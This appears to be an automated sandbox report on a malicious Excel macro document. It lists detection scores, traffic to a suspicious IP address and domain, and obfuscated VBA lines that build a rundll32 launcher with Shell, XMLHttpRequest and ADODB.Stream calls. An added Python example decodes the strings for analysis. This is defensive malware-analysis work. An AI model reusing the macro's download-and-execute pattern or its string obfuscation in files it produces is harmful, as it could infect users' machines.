Source: xls.xls | ReversingLabs: Detection: 17% |
Source: xls.xls | Virustotal: Detection: 39% |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: global traffic | TCP traffic: 192.168.2.22:49171 <-> 91.213.50.111:443 | 3 events client->server, 3 events server->client |
Source: global traffic | TCP traffic: 192.168.2.22:49172 <-> 91.213.50.111:443 | 3 events client->server, 3 events server->client |
Source: global traffic | TCP traffic: 192.168.2.22:49173 <-> 91.213.50.111:443 | 4 events client->server, 2 events server->client |
Source: global traffic | TCP traffic: 192.168.2.22:49174 <-> 91.213.50.111:443 | 3 events client->server, 3 events server->client |
Source: global traffic | TCP traffic: 192.168.2.22:49175 <-> 91.213.50.111:443 | 3 events client->server, 3 events server->client |
Source: global traffic | TCP traffic: 192.168.2.22:49176 <-> 91.213.50.111:443 | 4 events client->server, 2 events server->client |
Source: global traffic | DNS query: name: dooxil.com |
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 | 3 events |
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 | 3 events |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 | 4 events |
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 | 3 events |
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 | 3 events |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 | 4 events |
Source: unknown | DNS traffic detected: queries for: dooxil.com |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> local ports 49171, 49172, 49173, 49174, 49175, 49176 (one event per port) |
Source: unknown | Network traffic detected: HTTP traffic on local ports 49171, 49172, 49173, 49174, 49175, 49176 -> 443 (one event per port) |
Source: xls.xls | Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'ADODB.Stream' functions open, read, write |
Source: xls.xls | OLE, VBA macro line: riporti = trattasse(scoperte, Shell(riporti)) |
Source: xls.xls | OLE, VBA macro line: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)) |
Source: VBA code instrumentation | OLE, VBA macro: Module Foglio1, Function dimostrargli, String environ: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)) | Name: dimostrargli |
Source: xls.xls | Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'XMLHttpRequest' functions response, responsetext, open, send |
Source: VBA code instrumentation | OLE, VBA macro: Module Foglio1, Function stupidaggine, found possibly 'XMLHttpRequest' functions response, responsetext, open, send | Name: stupidaggine |
Source: xls.xls | OLE indicator, VBA macros: true |
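The macro lines above show the usual download-and-execute shape (XMLHttpRequest open/send, ADODB.Stream open/read/write, then Shell()) with every string literal run through ammiratrice(). The body of ammiratrice is not in the report, but the three samples on the page are consistent with one rule: drop every uppercase letter and digit, keep lowercase letters and punctuation; the integer argument does not change the result for any of them. The following is an added example, not code from the report or from the sample, that applies that inferred rule and replays the `scoperte` assignment. It assumes a default Windows ComSpec (`C:\Windows\system32\cmd.exe`, so Left(..., 20) yields the system32 directory), treats aspetteremo() as identity because its body is not on the page, and stubs Environ() with a constructed dictionary so it runs offline. Before relying on the decoded value, confirm the real ammiratrice body by dumping the Foglio1 module (for example with oletools' olevba).

```python
"""Replay the string obfuscation from the Foglio1 macro (added example)."""
import re
import string

# Inferred rule from the three samples on the page (an assumption, not the
# macro's recovered body): keep lowercase letters and punctuation, discard
# uppercase letters and digits. The numeric argument is accepted only to keep
# the macro's call signature; it is unused.
def ammiratrice(blob: str, _n: int = 0) -> str:
    return "".join(ch for ch in blob if ch.islower() or ch in string.punctuation)

# Constructed stand-in for VBA Environ(): default ComSpec on a stock Windows
# install. A non-default ComSpec changes the 20-character prefix below.
FAKE_ENV = {"comspec": r"C:\Windows\system32\cmd.exe"}

def environ(name: str) -> str:
    # Windows environment variable names are case-insensitive, as in VBA.
    return FAKE_ENV.get(name.lower(), "")

def aspetteremo(value: str) -> str:
    # Body not present in the report; assumed to be identity for this replay.
    return value

# The macro line exactly as it appears in the report.
MACRO_LINE = (
    'scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) '
    '& ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4))'
)

def rebuild_scoperte() -> str:
    """Evaluate the 'scoperte' expression step by step."""
    var_name = ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)   # environment variable name
    base = environ(var_name)[:20]                        # VBA Left(..., 20)
    return aspetteremo(
        base
        + ammiratrice("S5r1Yu3n11dIIl7lM87", 1)
        + "32"
        + ammiratrice("K60.3EHeNN7x56eO", 4)
    )

# Rewrite every ammiratrice("...", n) call in a VBA line with its decoded
# literal, so the de-obfuscated statement can be read directly.
CALL_RE = re.compile(r'ammiratrice\("([^"]*)",\s*(\d+)\)')

def decode_calls(vba_line: str) -> str:
    return CALL_RE.sub(
        lambda m: '"' + ammiratrice(m.group(1), int(m.group(2))) + '"', vba_line
    )

if __name__ == "__main__":
    print(decode_calls(MACRO_LINE))
    print(rebuild_scoperte())
```

Running the block rewrites the macro line to `scoperte = aspetteremo(Left(Environ("comspec"), 20) & "rundll" & "32" & ".exe")` and resolves `scoperte` to the system32 rundll32.exe path. What rundll32 is pointed at (the `riporti` argument built by trattasse() and passed to Shell()) is not visible in the report, so this decodes the launcher, not the payload.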
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR622B.tmp |
Source: xls.xls | OLE indicator, Workbook stream: true |
Source: classification engine | Classification label: mal68.expl.winXLS@1/0@1/1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (22 occurrences) |